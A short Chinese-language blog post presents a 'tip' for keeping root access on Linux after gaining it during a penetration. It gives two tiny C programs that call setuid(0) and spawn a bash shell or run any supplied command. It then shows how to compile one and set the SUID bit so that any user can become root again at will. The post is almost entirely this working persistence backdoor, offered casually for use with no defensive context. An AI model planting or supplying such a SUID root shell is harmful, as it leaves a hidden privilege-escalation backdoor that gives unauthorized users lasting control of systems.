Linux 获取 ROOT 权限后的维持小技巧

一个小技巧,做个笔记吧

当我们渗透的时候,从低权用户拿到 ROOT 权限了,一旦关闭了 Terminal 窗口 ROOT 权限就没了。为了解决这个问题,我们可以利用 Linux 的 SUID 技巧(人话就是S权限的二进制文件……)

代码:

#include <stdio.h>
int main()
{
    setuid(0);
    system("/bin/bash");
    return 0;
}

或者

#include <stdio.h>
int main(int argc,char* argv[])
{
    setuid(0);
    system(argv[1]);
    return 0;
}

拿到 ROOT 权限之后将上面的代码编译成执行程序

gcc -o rt code.c

然后赋予 S 权限(S权限自己百度)

chmod +s rt

然后愉快的在 ROOT 和非 ROOT 环境来回切换吧~

哎,就是玩儿~

© 版权声明
THE END
喜欢就支持一下吧
点赞10赞赏
分享
评论 共1条

请登录后发表评论